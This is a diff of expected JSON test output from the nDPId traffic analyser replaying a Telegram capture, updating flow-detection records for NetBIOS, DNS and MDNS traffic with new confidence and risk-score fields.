 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1588779626393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1588779626393,"pkt":"\/\/\/\/\/\/\/\/BJImXJc1CABFAADlSCQAAIARbWnAqAErwKgB\/wCKAIoA0XdaEQLkXsCoASsAigC7AAAgRUVFRkZERUxGRUVQRkFDTkZDRUNERkZFREJEQ0VIQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoAREVTS1RPUC1SQjVUMTJHAAoAAxAAAA8BVaoA"}
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1588779626394,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABOW9EAAEARmjHAqAFNwKgB\/wCJAIkAOrFARg4BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1588779626394,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABOiakAAEARbFnAqAFNwKgB\/wCJAIkAOrE9RhEBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1588779626394,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABONx8AAEARvuPAqAFNwKgB\/wCJAIkAOrE5RhUBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1588779628757,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1588779628757,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA7n3IAAP8RmKDAqAFNwKgBAcJkADUAJ31bFnMBAAABAAAAAAAABGRhdGkEbnRvcANvcmcAAAEAAQ=="}
-00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1588779628804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"ts_msec":1588779628804,"pkt":"KDc3AG3IEBMx8Tl2CABFAABr7g4AAEARCNXAqAEBwKgBTQA1wmQAVwAAFnOBgAABAAIAAAAABGRhdGkEbnRvcANvcmcAAAEAAcAMAAUAAQAAADwAFBFtYWlsLWRpZ2l0YWxvY2VhbsARwCsAAQABAAAAPAAEp2PXpA=="}
-00748{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1588779628804,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"167.99.215.164"}}
+00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1588779628804,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"167.99.215.164"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1588779629044,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1588779629044,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6m54AAEARW3bAqAFNwKgBARa0ADUAJpvbsPwBAAABAAAAAAAABXBpeGVsAndwA2NvbQAAAQAB"}
-00731{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1588779629045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1588779629045,"pkt":"KDc3AG3IAICPmq69CABFAABKxbFAAEAR8VLAqAEBwKgBTQA1FrQANpjhsPyBgAABAAEAAAAABXBpeGVsAndwA2NvbQAAAQABwAwAAQABAAAAAAAEwKgBnQ=="}
-00745{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1588779629045,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}}
+00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1588779629045,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1588779629079,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1588779629079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFpC4AAP8Rk9rAqAFNwKgBAdVDADUAMZzqakQBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00660{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":720,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1588779596464,"flow_last_seen":1588779631710,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":641,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1588779631710,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00686{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":720,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1588779596464,"flow_last_seen":1588779631710,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":641,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1588779631710,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 01063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1588779632305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1588779632305,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsdQUAAEARQgfAqAFN\/\/\/\/\/0RcRFwB2FvpeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
 01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1588779632305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1588779632305,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsvq0AAEARNbfAqAFNwKgB\/0RcRFwB2JlBeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1588779632315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779632315,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABES\/gAAEARqizAqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1588779634762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1588779634762,"pkt":"EBMx8Tl2KDc3AG3ICABFAAViWJsAAEARtXvAqAFN2DrNRPIWAbsFTgTHw1EwNDZQozVJE19KlwkAAAABdLDg+WGAhzOZu62GoAEEAENITE8ZAAAAUEFEAPUBAABTTkkAAwIAAFNUSwA5AgAAVkVSAD0CAABDQ1MATQIAAE5PTkNtAgAAQUVBRHECAABVQUlEoAIAAFNDSUSwAgAAVENJRLQCAABQRE1EuAIAAFNNSEy8AgAASUNTTMACAABOT05Q4AIAAFBVQlMAAwAATUlEUwQDAABTQ0xTCAMAAEtFWFMMAwAAWExDVBQDAABDU0NUFAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cuZ29vZ2xlLmNvbfji0b2UKZEBPixRS8R5FV4DZD4i7T\/6B0Z4nKaYTElCcNQLL0+vajT\/QP9tp6wIGReVi8x7NFEwNDYB6IFgkpIa6H7tgIaiFYKRXrLacjAwMDAwMDAwAuVjx2eeSNkn+AhDtSgQn3BeW8lDQzIwYmV0YSBDaHJvbWUvODMuMC40MTAzLjM0IEludGVsIE1hYyBPUyBYIDEwXzEzXzYriYKzggSKpsC6slaoCl0fAAAAAFg1MDkBAAAAHgAAAAuXQLYHE9JIhKrGV8rvXoOxMjFuf2JfKTHXlSKWC8+sAyENtsO94X6K9sux59v7JM7rsrjePubGsEAWqYL7e1xkAAAAAQAAAEMyNTXvR+qpngpSje9H6qmeClKNYDLLkqBBTd8GdwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA